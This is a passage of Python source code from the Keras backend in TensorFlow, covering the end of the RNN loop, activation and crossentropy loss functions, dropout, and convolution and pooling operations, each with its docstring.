time: Current timestep value.
output_ta_t: TensorArray.
prev_output: tuple of outputs from time - 1.
*states: List of states.
Returns:
Tuple: `(time + 1, output_ta_t, output) + tuple(new_states)`
"""
current_input = tuple(ta.read(time) for ta in input_ta)
# maybe set shape.
current_input = nest.pack_sequence_as(inputs, current_input)
mask_t = mask_ta.read(time)
output, new_states = step_function(current_input,
tuple(states) + tuple(constants))
# mask output
flat_output = nest.flatten(output)
flat_mask_output = (flat_zero_output if zero_output_for_mask
else nest.flatten(prev_output))
tiled_mask_t = tuple(_expand_mask(mask_t, o) for o in flat_output)
flat_new_output = tuple(
array_ops.where(m, o, zo) for m, o, zo in zip(
tiled_mask_t, flat_output, flat_mask_output))
# mask states
flat_state = nest.flatten(states)
flat_new_state = nest.flatten(new_states)
for state, new_state in zip(flat_state, flat_new_state):
if hasattr(new_state, 'set_shape'):
new_state.set_shape(state.shape)
tiled_mask_t = tuple(_expand_mask(mask_t, s) for s in flat_state)
flat_final_state = tuple(
array_ops.where(m, s, ps)
for m, s, ps in zip(tiled_mask_t, flat_new_state, flat_state))
new_states = nest.pack_sequence_as(new_states, flat_final_state)
output_ta_t = tuple(
ta.write(time, out)
for ta, out in zip(output_ta_t, flat_new_output))
return (time + 1, output_ta_t,
tuple(flat_new_output)) + tuple(new_states)
final_outputs = control_flow_ops.while_loop(
body=_step,
loop_vars=(time, output_ta, flat_zero_output) + states,
**while_loop_kwargs)
# Skip final_outputs[2] which is the output for final timestep.
new_states = final_outputs[3:]
else:
def _step(time, output_ta_t, *states):
"""RNN step function.
Arguments:
time: Current timestep value.
output_ta_t: TensorArray.
*states: List of states.
Returns:
Tuple: `(time + 1,output_ta_t) + tuple(new_states)`
"""
current_input = tuple(ta.read(time) for ta in input_ta)
current_input = nest.pack_sequence_as(inputs, current_input)
output, new_states = step_function(current_input,
tuple(states) + tuple(constants))
flat_state = nest.flatten(states)
flat_new_state = nest.flatten(new_states)
for state, new_state in zip(flat_state, flat_new_state):
if hasattr(new_state, 'set_shape'):
new_state.set_shape(state.shape)
flat_output = nest.flatten(output)
output_ta_t = tuple(
ta.write(time, out) for ta, out in zip(output_ta_t, flat_output))
new_states = nest.pack_sequence_as(initial_states, flat_new_state)
return (time + 1, output_ta_t) + tuple(new_states)
final_outputs = control_flow_ops.while_loop(
body=_step,
loop_vars=(time, output_ta) + states,
**while_loop_kwargs)
new_states = final_outputs[2:]
output_ta = final_outputs[1]
outputs = tuple(o.stack() for o in output_ta)
last_output = tuple(o[-1] for o in outputs)
outputs = nest.pack_sequence_as(output_time_zero, outputs)
last_output = nest.pack_sequence_as(output_time_zero, last_output)
# static shape inference
def set_shape(output_):
if hasattr(output_, 'set_shape'):
shape = output_.shape.as_list()
shape[0] = time_steps
shape[1] = batch
output_.set_shape(shape)
return output_
outputs = nest.map_structure(set_shape, outputs)
if not time_major:
outputs = nest.map_structure(swap_batch_timestep, outputs)
return last_output, outputs, new_states
@keras_export('keras.backend.switch')
def switch(condition, then_expression, else_expression):
"""Switches between two operations depending on a scalar value.
Note that both `then_expression` and `else_expression`
should be symbolic tensors of the *same shape*.
Arguments:
condition: tensor (`int` or `bool`).
then_expression: either a tensor, or a callable that returns a tensor.
else_expression: either a tensor, or a callable that returns a tensor.
Returns:
The selected tensor.
Raises:
ValueError: If rank of `condition` is greater than rank of expressions.
"""
if condition.dtype != dtypes_module.bool:
condition = math_ops.cast(condition, 'bool')
cond_ndim = ndim(condition)
if not cond_ndim:
if not callable(then_expression):
def then_expression_fn():
return then_expression
else:
then_expression_fn = then_expression
if not callable(else_expression):
def else_expression_fn():
return else_expression
else:
else_expression_fn = else_expression
x = control_flow_ops.cond(condition, then_expression_fn, else_expression_fn)
else:
# tf.where needs its condition tensor
# to be the same shape as its two
# result tensors
if callable(then_expression):
then_expression = then_expression()
if callable(else_expression):
else_expression = else_expression()
expr_ndim = ndim(then_expression)
if cond_ndim > expr_ndim:
raise ValueError('Rank of `condition` should be less than or'
' equal to rank of `then_expression` and '
'`else_expression`. ndim(condition)=' + str(cond_ndim) +
', ndim(then_expression)'
'=' + str(expr_ndim))
if cond_ndim > 1:
ndim_diff = expr_ndim - cond_ndim
cond_shape = array_ops.concat(
[array_ops.shape(condition), [1] * ndim_diff], axis=0)
condition = array_ops.reshape(condition, cond_shape)
expr_shape = array_ops.shape(then_expression)
shape_diff = expr_shape - cond_shape
tile_shape = array_ops.where(shape_diff > 0, expr_shape,
array_ops.ones_like(expr_shape))
condition = array_ops.tile(condition, tile_shape)
x = array_ops.where(condition, then_expression, else_expression)
return x
@keras_export('keras.backend.in_train_phase')
def in_train_phase(x, alt, training=None):
"""Selects `x` in train phase, and `alt` otherwise.
Note that `alt` should have the *same shape* as `x`.
Arguments:
x: What to return in train phase
(tensor or callable that returns a tensor).
alt: What to return otherwise
(tensor or callable that returns a tensor).
training: Optional scalar tensor
(or Python boolean, or Python integer)
specifying the learning phase.
Returns:
Either `x` or `alt` based on the `training` flag.
the `training` flag defaults to `K.learning_phase()`.
"""
if training is None:
training = learning_phase()
if training == 1 or training is True:
if callable(x):
return x()
else:
return x
elif training == 0 or training is False:
if callable(alt):
return alt()
else:
return alt
# else: assume learning phase is a placeholder tensor.
x = switch(training, x, alt)
return x
@keras_export('keras.backend.in_test_phase')
def in_test_phase(x, alt, training=None):
"""Selects `x` in test phase, and `alt` otherwise.
Note that `alt` should have the *same shape* as `x`.
Arguments:
x: What to return in test phase
(tensor or callable that returns a tensor).
alt: What to return otherwise
(tensor or callable that returns a tensor).
training: Optional scalar tensor
(or Python boolean, or Python integer)
specifying the learning phase.
Returns:
Either `x` or `alt` based on `K.learning_phase`.
"""
return in_train_phase(alt, x, training=training)
# NN OPERATIONS
@keras_export('keras.backend.relu')
def relu(x, alpha=0., max_value=None, threshold=0):
"""Rectified linear unit.
With default values, it returns element-wise `max(x, 0)`.
Otherwise, it follows:
`f(x) = max_value` for `x >= max_value`,
`f(x) = x` for `threshold <= x < max_value`,
`f(x) = alpha * (x - threshold)` otherwise.
Arguments:
x: A tensor or variable.
alpha: A scalar, slope of negative section (default=`0.`).
max_value: float. Saturation threshold.
threshold: float. Threshold value for thresholded activation.
Returns:
A tensor.
"""
if alpha != 0.:
if max_value is None and threshold == 0:
return nn.leaky_relu(x, alpha=alpha)
if threshold != 0:
negative_part = nn.relu(-x + threshold)
else:
negative_part = nn.relu(-x)
clip_max = max_value is not None
if threshold != 0:
# computes x for x > threshold else 0
x = x * math_ops.cast(math_ops.greater(x, threshold), floatx())
elif max_value == 6:
# if no threshold, then can use nn.relu6 native TF op for performance
x = nn.relu6(x)
clip_max = False
else:
x = nn.relu(x)
if clip_max:
max_value = _constant_to_tensor(max_value, x.dtype.base_dtype)
zero = _constant_to_tensor(0., x.dtype.base_dtype)
x = clip_ops.clip_by_value(x, zero, max_value)
if alpha != 0.:
alpha = _to_tensor(alpha, x.dtype.base_dtype)
x -= alpha * negative_part
return x
@keras_export('keras.backend.elu')
def elu(x, alpha=1.):
"""Exponential linear unit.
Arguments:
x: A tensor or variable to compute the activation function for.
alpha: A scalar, slope of negative section.
Returns:
A tensor.
"""
res = nn.elu(x)
if alpha == 1:
return res
else:
return array_ops.where(x > 0, res, alpha * res)
@keras_export('keras.backend.softmax')
def softmax(x, axis=-1):
"""Softmax of a tensor.
Arguments:
x: A tensor or variable.
axis: The dimension softmax would be performed on.
The default is -1 which indicates the last dimension.
Returns:
A tensor.
"""
return nn.softmax(x, axis=axis)
@keras_export('keras.backend.softplus')
def softplus(x):
"""Softplus of a tensor.
Arguments:
x: A tensor or variable.
Returns:
A tensor.
"""
return nn.softplus(x)
@keras_export('keras.backend.softsign')
def softsign(x):
"""Softsign of a tensor.
Arguments:
x: A tensor or variable.
Returns:
A tensor.
"""
return nn.softsign(x)
@keras_export('keras.backend.categorical_crossentropy')
def categorical_crossentropy(target, output, from_logits=False, axis=-1):
"""Categorical crossentropy between an output tensor and a target tensor.
Arguments:
target: A tensor of the same shape as `output`.
output: A tensor resulting from a softmax
(unless `from_logits` is True, in which
case `output` is expected to be the logits).
from_logits: Boolean, whether `output` is the
result of a softmax, or is a tensor of logits.
axis: Int specifying the channels axis. `axis=-1` corresponds to data
format `channels_last', and `axis=1` corresponds to data format
`channels_first`.
Returns:
Output tensor.
Raises:
ValueError: if `axis` is neither -1 nor one of the axes of `output`.
"""
if not from_logits:
if (isinstance(output, (ops.EagerTensor, variables_module.Variable)) or
output.op.type != 'Softmax'):
axis = axis % len(output.shape)
# scale preds so that the class probas of each sample sum to 1
output = output / math_ops.reduce_sum(output, axis, True)
# Compute cross entropy from probabilities.
epsilon_ = _constant_to_tensor(epsilon(), output.dtype.base_dtype)
output = clip_ops.clip_by_value(output, epsilon_, 1. - epsilon_)
return -math_ops.reduce_sum(target * math_ops.log(output), axis)
else:
# When softmax activation function is used for output operation, we
# use logits from the softmax function directly to compute loss in order
# to prevent collapsing zero when training.
# See b/117284466
assert len(output.op.inputs) == 1
output = output.op.inputs[0]
return nn.softmax_cross_entropy_with_logits_v2(labels=target, logits=output)
@keras_export('keras.backend.sparse_categorical_crossentropy')
def sparse_categorical_crossentropy(target, output, from_logits=False, axis=-1):
"""Categorical crossentropy with integer targets.
Arguments:
target: An integer tensor.
output: A tensor resulting from a softmax
(unless `from_logits` is True, in which
case `output` is expected to be the logits).
from_logits: Boolean, whether `output` is the
result of a softmax, or is a tensor of logits.
axis: Int specifying the channels axis. `axis=-1` corresponds to data
format `channels_last', and `axis=1` corresponds to data format
`channels_first`.
Returns:
Output tensor.
Raises:
ValueError: if `axis` is neither -1 nor one of the axes of `output`.
"""
if not from_logits:
if (isinstance(output, (ops.EagerTensor, variables_module.Variable)) or
output.op.type != 'Softmax'):
epsilon_ = _constant_to_tensor(epsilon(), output.dtype.base_dtype)
output = clip_ops.clip_by_value(output, epsilon_, 1 - epsilon_)
output = math_ops.log(output)
else:
# When softmax activation function is used for output operation, we
# use logits from the softmax function directly to compute loss in order
# to prevent collapsing zero when training.
# See b/117284466
assert len(output.op.inputs) == 1
output = output.op.inputs[0]
rank = len(output.shape)
axis = axis % rank
if axis != rank - 1:
permutation = list(range(axis)) + list(range(axis + 1, rank)) + [axis]
output = array_ops.transpose(output, perm=permutation)
output_shape = output.shape
targets = cast(flatten(target), 'int64')
logits = array_ops.reshape(output, [-1, int(output_shape[-1])])
res = nn.sparse_softmax_cross_entropy_with_logits(
labels=targets, logits=logits)
if len(output_shape) >= 3:
# If our output includes timesteps or spatial dimensions we need to reshape
return array_ops.reshape(res, array_ops.shape(output)[:-1])
else:
return res
@keras_export('keras.backend.binary_crossentropy')
def binary_crossentropy(target, output, from_logits=False):
"""Binary crossentropy between an output tensor and a target tensor.
Arguments:
target: A tensor with the same shape as `output`.
output: A tensor.
from_logits: Whether `output` is expected to be a logits tensor.
By default, we consider that `output`
encodes a probability distribution.
Returns:
A tensor.
"""
if not from_logits:
if (isinstance(output, (ops.EagerTensor, variables_module.Variable)) or
output.op.type != 'Sigmoid'):
epsilon_ = _constant_to_tensor(epsilon(), output.dtype.base_dtype)
output = clip_ops.clip_by_value(output, epsilon_, 1. - epsilon_)
# Compute cross entropy from probabilities.
bce = target * math_ops.log(output + epsilon())
bce += (1 - target) * math_ops.log(1 - output + epsilon())
return -bce
else:
# When sigmoid activation function is used for output operation, we
# use logits from the sigmoid function directly to compute loss in order
# to prevent collapsing zero when training.
assert len(output.op.inputs) == 1
output = output.op.inputs[0]
return nn.sigmoid_cross_entropy_with_logits(labels=target, logits=output)
@keras_export('keras.backend.sigmoid')
def sigmoid(x):
"""Element-wise sigmoid.
Arguments:
x: A tensor or variable.
Returns:
A tensor.
"""
return nn.sigmoid(x)
@keras_export('keras.backend.hard_sigmoid')
def hard_sigmoid(x):
"""Segment-wise linear approximation of sigmoid.
Faster than sigmoid.
Returns `0.` if `x < -2.5`, `1.` if `x > 2.5`.
In `-2.5 <= x <= 2.5`, returns `0.2 * x + 0.5`.
Arguments:
x: A tensor or variable.
Returns:
A tensor.
"""
point_two = _constant_to_tensor(0.2, x.dtype.base_dtype)
point_five = _constant_to_tensor(0.5, x.dtype.base_dtype)
x = math_ops.mul(x, point_two)
x = math_ops.add(x, point_five)
x = clip_ops.clip_by_value(x, 0., 1.)
return x
@keras_export('keras.backend.tanh')
def tanh(x):
"""Element-wise tanh.
Arguments:
x: A tensor or variable.
Returns:
A tensor.
"""
return nn.tanh(x)
@keras_export('keras.backend.dropout')
def dropout(x, level, noise_shape=None, seed=None):
"""Sets entries in `x` to zero at random, while scaling the entire tensor.
Arguments:
x: tensor
level: fraction of the entries in the tensor
that will be set to 0.
noise_shape: shape for randomly generated keep/drop flags,
must be broadcastable to the shape of `x`
seed: random seed to ensure determinism.
Returns:
A tensor.
"""
if seed is None:
seed = np.random.randint(10e6)
return nn.dropout_v2(x, rate=level, noise_shape=noise_shape, seed=seed)
@keras_export('keras.backend.l2_normalize')
def l2_normalize(x, axis=None):
"""Normalizes a tensor wrt the L2 norm alongside the specified axis.
Arguments:
x: Tensor or variable.
axis: axis along which to perform normalization.
Returns:
A tensor.
"""
return nn.l2_normalize(x, axis=axis)
@keras_export('keras.backend.in_top_k')
def in_top_k(predictions, targets, k):
"""Returns whether the `targets` are in the top `k` `predictions`.
Arguments:
predictions: A tensor of shape `(batch_size, classes)` and type `float32`.
targets: A 1D tensor of length `batch_size` and type `int32` or `int64`.
k: An `int`, number of top elements to consider.
Returns:
A 1D tensor of length `batch_size` and type `bool`.
`output[i]` is `True` if `predictions[i, targets[i]]` is within top-`k`
values of `predictions[i]`.
"""
return nn.in_top_k(predictions, targets, k)
# CONVOLUTIONS
def _preprocess_conv1d_input(x, data_format):
"""Transpose and cast the input before the conv1d.
Arguments:
x: input tensor.
data_format: string, `"channels_last"` or `"channels_first"`.
Returns:
A tensor.
"""
tf_data_format = 'NWC' # to pass TF Conv2dNative operations
if data_format == 'channels_first':
if not _has_nchw_support():
x = array_ops.transpose(x, (0, 2, 1)) # NCW -> NWC
else:
tf_data_format = 'NCW'
return x, tf_data_format
def _preprocess_conv2d_input(x, data_format, force_transpose=False):
"""Transpose and cast the input before the conv2d.
Arguments:
x: input tensor.
data_format: string, `"channels_last"` or `"channels_first"`.
force_transpose: Boolean. If True, the input will always be transposed
from NCHW to NHWC if `data_format` is `"channels_first"`.
If False, the transposition only occurs on CPU (GPU ops are
assumed to support NCHW).
Returns:
A tensor.
"""
tf_data_format = 'NHWC'
if data_format == 'channels_first':
if not _has_nchw_support() or force_transpose:
x = array_ops.transpose(x, (0, 2, 3, 1)) # NCHW -> NHWC
else:
tf_data_format = 'NCHW'
return x, tf_data_format
def _preprocess_conv3d_input(x, data_format):
"""Transpose and cast the input before the conv3d.
Arguments:
x: input tensor.
data_format: string, `"channels_last"` or `"channels_first"`.
Returns:
A tensor.
"""
tf_data_format = 'NDHWC'
if data_format == 'channels_first':
if not _has_nchw_support():
x = array_ops.transpose(x, (0, 2, 3, 4, 1))
else:
tf_data_format = 'NCDHW'
return x, tf_data_format
def _preprocess_padding(padding):
"""Convert keras' padding to TensorFlow's padding.
Arguments:
padding: string, one of 'same' , 'valid'
Returns:
a string, one of 'SAME', 'VALID'.
Raises:
ValueError: if invalid `padding'`
"""
if padding == 'same':
padding = 'SAME'
elif padding == 'valid':
padding = 'VALID'
else:
raise ValueError('Invalid padding: ' + str(padding))
return padding
@keras_export('keras.backend.conv1d')
def conv1d(x,
kernel,
strides=1,
padding='valid',
data_format=None,
dilation_rate=1):
"""1D convolution.
Arguments:
x: Tensor or variable.
kernel: kernel tensor.
strides: stride integer.
padding: string, `"same"`, `"causal"` or `"valid"`.
data_format: string, one of "channels_last", "channels_first".
dilation_rate: integer dilate rate.
Returns:
A tensor, result of 1D convolution.
Raises:
ValueError: if `data_format` is neither `channels_last` or
`channels_first`.
"""
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format: ' + str(data_format))
kernel_shape = kernel.shape.as_list()
if padding == 'causal':
# causal (dilated) convolution:
left_pad = dilation_rate * (kernel_shape[0] - 1)
x = temporal_padding(x, (left_pad, 0))
padding = 'valid'
padding = _preprocess_padding(padding)
x, tf_data_format = _preprocess_conv1d_input(x, data_format)
x = nn.convolution(
input=x,
filter=kernel,
dilation_rate=dilation_rate,
strides=strides,
padding=padding,
data_format=tf_data_format)
if data_format == 'channels_first' and tf_data_format == 'NWC':
x = array_ops.transpose(x, (0, 2, 1)) # NWC -> NCW
return x
@keras_export('keras.backend.conv2d')
def conv2d(x,
kernel,
strides=(1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1)):
"""2D convolution.
Arguments:
x: Tensor or variable.
kernel: kernel tensor.
strides: strides tuple.
padding: string, `"same"` or `"valid"`.
data_format: `"channels_last"` or `"channels_first"`.
Whether to use Theano or TensorFlow data format
for inputs/kernels/outputs.
dilation_rate: tuple of 2 integers.
Returns:
A tensor, result of 2D convolution.
Raises:
ValueError: if `data_format` is neither `channels_last` or
`channels_first`.
"""
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format: ' + str(data_format))
x, tf_data_format = _preprocess_conv2d_input(x, data_format)
padding = _preprocess_padding(padding)
x = nn.convolution(
input=x,
filter=kernel,
dilation_rate=dilation_rate,
strides=strides,
padding=padding,
data_format=tf_data_format)
if data_format == 'channels_first' and tf_data_format == 'NHWC':
x = array_ops.transpose(x, (0, 3, 1, 2)) # NHWC -> NCHW
return x
@keras_export('keras.backend.conv2d_transpose')
def conv2d_transpose(x,
kernel,
output_shape,
strides=(1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1)):
"""2D deconvolution (i.e.
transposed convolution).
Arguments:
x: Tensor or variable.
kernel: kernel tensor.
output_shape: 1D int tensor for the output shape.
strides: strides tuple.
padding: string, `"same"` or `"valid"`.
data_format: string, `"channels_last"` or `"channels_first"`.
Whether to use Theano or TensorFlow/CNTK data format
for inputs/kernels/outputs.
dilation_rate: Tuple of 2 integers.
Returns:
A tensor, result of transposed 2D convolution.
Raises:
ValueError: if `data_format` is neither `channels_last` or
`channels_first`.
"""
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format: ' + str(data_format))
if isinstance(output_shape, (tuple, list)):
output_shape = array_ops.stack(output_shape)
# `atrous_conv2d_transpose` only supports NHWC format, even on GPU.
if data_format == 'channels_first' and dilation_rate != (1, 1):
force_transpose = True
else:
force_transpose = False
x, tf_data_format = _preprocess_conv2d_input(x, data_format, force_transpose)
if data_format == 'channels_first' and tf_data_format == 'NHWC':
output_shape = (output_shape[0], output_shape[2], output_shape[3],
output_shape[1])
if output_shape[0] is None:
output_shape = (array_ops.shape(x)[0],) + tuple(output_shape[1:])
output_shape = array_ops.stack(list(output_shape))
padding = _preprocess_padding(padding)
if tf_data_format == 'NHWC':
strides = (1,) + strides + (1,)
else:
strides = (1, 1) + strides
if dilation_rate == (1, 1):
x = nn.conv2d_transpose(x, kernel, output_shape, strides,
padding=padding,
data_format=tf_data_format)
else:
assert dilation_rate[0] == dilation_rate[1]
x = nn.atrous_conv2d_transpose(
x,
kernel,
output_shape,
rate=dilation_rate[0],
padding=padding)
if data_format == 'channels_first' and tf_data_format == 'NHWC':
x = array_ops.transpose(x, (0, 3, 1, 2)) # NHWC -> NCHW
return x
def separable_conv1d(x,
depthwise_kernel,
pointwise_kernel,
strides=1,
padding='valid',
data_format=None,
dilation_rate=1):
"""1D convolution with separable filters.
Arguments:
x: input tensor
depthwise_kernel: convolution kernel for the depthwise convolution.
pointwise_kernel: kernel for the 1x1 convolution.
strides: stride integer.
padding: string, `"same"` or `"valid"`.
data_format: string, `"channels_last"` or `"channels_first"`.
dilation_rate: integer dilation rate.
Returns:
Output tensor.
Raises:
ValueError: if `data_format` is neither `channels_last` or
`channels_first`.
"""
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format: ' + str(data_format))
if isinstance(strides, int):
strides = (strides,)
if isinstance(dilation_rate, int):
dilation_rate = (dilation_rate,)
x, tf_data_format = _preprocess_conv1d_input(x, data_format)
padding = _preprocess_padding(padding)
if not isinstance(strides, tuple):
strides = tuple(strides)
if tf_data_format == 'NWC':
spatial_start_dim = 1
strides = (1,) + strides * 2 + (1,)
else:
spatial_start_dim = 2
strides = (1, 1) + strides * 2
x = array_ops.expand_dims(x, spatial_start_dim)
depthwise_kernel = array_ops.expand_dims(depthwise_kernel, 0)
pointwise_kernel = array_ops.expand_dims(pointwise_kernel, 0)
dilation_rate = (1,) + dilation_rate
x = nn.separable_conv2d(
x,
depthwise_kernel,
pointwise_kernel,
strides=strides,
padding=padding,
rate=dilation_rate,
data_format=tf_data_format)
x = array_ops.squeeze(x, [spatial_start_dim])
if data_format == 'channels_first' and tf_data_format == 'NWC':
x = array_ops.transpose(x, (0, 2, 1)) # NWC -> NCW
return x
@keras_export('keras.backend.separable_conv2d')
def separable_conv2d(x,
depthwise_kernel,
pointwise_kernel,
strides=(1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1)):
"""2D convolution with separable filters.
Arguments:
x: input tensor
depthwise_kernel: convolution kernel for the depthwise convolution.
pointwise_kernel: kernel for the 1x1 convolution.
strides: strides tuple (length 2).
padding: string, `"same"` or `"valid"`.
data_format: string, `"channels_last"` or `"channels_first"`.
dilation_rate: tuple of integers,
dilation rates for the separable convolution.
Returns:
Output tensor.
Raises:
ValueError: if `data_format` is neither `channels_last` or
`channels_first`.
ValueError: if `strides` is not a tuple of 2 integers.
"""
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format: ' + str(data_format))
if len(strides) != 2:
raise ValueError('`strides` must be a tuple of 2 integers.')
x, tf_data_format = _preprocess_conv2d_input(x, data_format)
padding = _preprocess_padding(padding)
if not isinstance(strides, tuple):
strides = tuple(strides)
if tf_data_format == 'NHWC':
strides = (1,) + strides + (1,)
else:
strides = (1, 1) + strides
x = nn.separable_conv2d(
x,
depthwise_kernel,
pointwise_kernel,
strides=strides,
padding=padding,
rate=dilation_rate,
data_format=tf_data_format)
if data_format == 'channels_first' and tf_data_format == 'NHWC':
x = array_ops.transpose(x, (0, 3, 1, 2)) # NHWC -> NCHW
return x
def depthwise_conv2d(x,
depthwise_kernel,
strides=(1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1)):
"""2D convolution with separable filters.
Arguments:
x: input tensor
depthwise_kernel: convolution kernel for the depthwise convolution.
strides: strides tuple (length 2).
padding: string, `"same"` or `"valid"`.
data_format: string, `"channels_last"` or `"channels_first"`.
dilation_rate: tuple of integers,
dilation rates for the separable convolution.
Returns:
Output tensor.
Raises:
ValueError: if `data_format` is neither `channels_last` or
`channels_first`.
"""
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format: ' + str(data_format))
x, tf_data_format = _preprocess_conv2d_input(x, data_format)
padding = _preprocess_padding(padding)
if tf_data_format == 'NHWC':
strides = (1,) + strides + (1,)
else:
strides = (1, 1) + strides
x = nn.depthwise_conv2d(
x,
depthwise_kernel,
strides=strides,
padding=padding,
rate=dilation_rate,
data_format=tf_data_format)
if data_format == 'channels_first' and tf_data_format == 'NHWC':
x = array_ops.transpose(x, (0, 3, 1, 2)) # NHWC -> NCHW
return x
@keras_export('keras.backend.conv3d')
def conv3d(x,
kernel,
strides=(1, 1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1, 1)):
"""3D convolution.
Arguments:
x: Tensor or variable.
kernel: kernel tensor.
strides: strides tuple.
padding: string, `"same"` or `"valid"`.
data_format: string, `"channels_last"` or `"channels_first"`.
Whether to use Theano or TensorFlow/CNTK data format
for inputs/kernels/outputs.
dilation_rate: tuple of 3 integers.
Returns:
A tensor, result of 3D convolution.
Raises:
ValueError: if `data_format` is neither `channels_last` or
`channels_first`.
"""
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format: ' + str(data_format))
x, tf_data_format = _preprocess_conv3d_input(x, data_format)
padding = _preprocess_padding(padding)
x = nn.convolution(
input=x,
filter=kernel,
dilation_rate=dilation_rate,
strides=strides,
padding=padding,
data_format=tf_data_format)
if data_format == 'channels_first' and tf_data_format == 'NDHWC':
x = array_ops.transpose(x, (0, 4, 1, 2, 3))
return x
def conv3d_transpose(x,
kernel,
output_shape,
strides=(1, 1, 1),
padding='valid',
data_format=None):
"""3D deconvolution (i.e.
transposed convolution).
Arguments:
x: input tensor.
kernel: kernel tensor.
output_shape: 1D int tensor for the output shape.
strides: strides tuple.
padding: string, "same" or "valid".
data_format: string, `"channels_last"` or `"channels_first"`.
Whether to use Theano or TensorFlow/CNTK data format
for inputs/kernels/outputs.
Returns:
A tensor, result of transposed 3D convolution.
Raises:
ValueError: if `data_format` is neither `channels_last` or
`channels_first`.
"""
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format: ' + str(data_format))
if isinstance(output_shape, (tuple, list)):
output_shape = array_ops.stack(output_shape)
x, tf_data_format = _preprocess_conv3d_input(x, data_format)
if data_format == 'channels_first' and tf_data_format == 'NDHWC':
output_shape = (output_shape[0], output_shape[2], output_shape[3],
output_shape[4], output_shape[1])
if output_shape[0] is None:
output_shape = (array_ops.shape(x)[0],) + tuple(output_shape[1:])
output_shape = array_ops.stack(list(output_shape))
padding = _preprocess_padding(padding)
if tf_data_format == 'NDHWC':
strides = (1,) + strides + (1,)
else:
strides = (1, 1) + strides
x = nn.conv3d_transpose(
x,
kernel,
output_shape,
strides,
padding=padding,
data_format=tf_data_format)
if data_format == 'channels_first' and tf_data_format == 'NDHWC':
x = array_ops.transpose(x, (0, 4, 1, 2, 3))
return x
@keras_export('keras.backend.pool2d')
def pool2d(x,
pool_size,
strides=(1, 1),
padding='valid',
data_format=None,
pool_mode='max'):
"""2D Pooling.
Arguments:
x: Tensor or variable.
pool_size: tuple of 2 integers.
strides: tuple of 2 integers.
padding: string, `"same"` or `"valid"`.
data_format: string, `"channels_last"` or `"channels_first"`.
pool_mode: string, `"max"` or `"avg"`.
Returns:
A tensor, result of 2D pooling.
Raises:
ValueError: if `data_format` is neither `"channels_last"` or
`"channels_first"`.
ValueError: if `pool_size` is not a tuple of 2 integers.
ValueError: if `strides` is not a tuple of 2 integers.
ValueError: if `pool_mode` is neither `"max"` or `"avg"`.
"""
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format: ' + str(data_format))
if len(pool_size) != 2:
raise ValueError('`pool_size` must be a tuple of 2 integers.')
if len(strides) != 2:
raise ValueError('`strides` must be a tuple of 2 integers.')
x, tf_data_format = _preprocess_conv2d_input(x, data_format)
padding = _preprocess_padding(padding)
if tf_data_format == 'NHWC':
strides = (1,) + strides + (1,)
pool_size = (1,) + pool_size + (1,)
else:
strides = (1, 1) + strides
pool_size = (1, 1) + pool_size
if pool_mode == 'max':
x = nn.max_pool(
x, pool_size, strides, padding=padding, data_format=tf_data_format)
elif pool_mode == 'avg':
x = nn.avg_pool(
x, pool_size, strides, padding=padding, data_format=tf_data_format)
else:
raise ValueError('Invalid pooling mode: ' + str(pool_mode))
if data_format == 'channels_first' and tf_data_format == 'NHWC':
x = array_ops.transpose(x, (0, 3, 1, 2)) # NHWC -> NCHW
return x
@keras_export('keras.backend.pool3d')
def pool3d(x,
pool_size,
strides=(1, 1, 1),
padding='valid',
data_format=None,
pool_mode='max'):
"""3D Pooling.
Arguments:
x: Tensor or variable.
pool_size: tuple of 3 integers.
strides: tuple of 3 integers.
padding: string, `"same"` or `"valid"`.
data_format: string, `"channels_last"` or `"channels_first"`.
pool_mode: string, `"max"` or `"avg"`.
Returns:
A tensor, result of 3D pooling.
Raises:
ValueError: if `data_format` is neither `"channels_last"` or
`"channels_first"`.
ValueError: if `pool_mode` is neither `"max"` or `"avg"`.
"""
if data_format is None:
data_format = image_data_format()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError('Unknown data_format: ' + str(data_format))
x, tf_data_format = _preprocess_conv3d_input(x, data_format)
padding = _preprocess_padding(padding)
if tf_data_format == 'NDHWC':
strides = (1,) + strides + (1,)
pool_size = (1,) + pool_size + (1,)
else:
strides = (1, 1) + strides
pool_size = (1, 1) + pool_size
if pool_mode == 'max':
x = nn.max_pool3d(
x, pool_size, strides, padding=padding, data_format=tf_data_format)
elif pool_mode == 'avg':
x = nn.avg_pool3d(
x, pool_size, strides, padding=padding, data_format=tf_data_format)
else:
raise ValueError('Invalid pooling mode: ' + str(pool_mode))
if data_format == 'channels_first' and tf_data_format == 'NDHWC':
x = array_ops.transpose(x, (0, 4, 1, 2, 3))
return x
def local_conv(inputs,
kernel,
kernel_size,
strides,
output_shape,
data_format=None):
"""Apply N-D convolution with un-shared weights.
Arguments:
inputs: (N+2)-D tensor with shape
(batch_size, channels_in, d_in1, ..., d_inN)
if data_format='channels_first', or
(batch_size, d_in1, ..., d_inN, channels_in)
if data_format='channels_last'.
kernel: the unshared weight for N-D convolution,
with shape (output_items, feature_dim, channels_out), where
feature_dim = np.prod(kernel_size) * channels_in,
output_items = np.prod(output_shape).
kernel_size: a tuple of N integers, specifying the
spatial dimensions of the N-D convolution window.
strides: a tuple of N integers, specifying the strides
of the convolution along the spatial dimensions.
output_shape: a tuple of (d_out1, ..., d_outN) specifying the spatial
dimensionality of the output.
data_format: string, "channels_first" or "channels_last".
Returns:
An (N+2)-D tensor with shape:
(batch_size, channels_out) + output_shape
if data_format='channels_first', or:
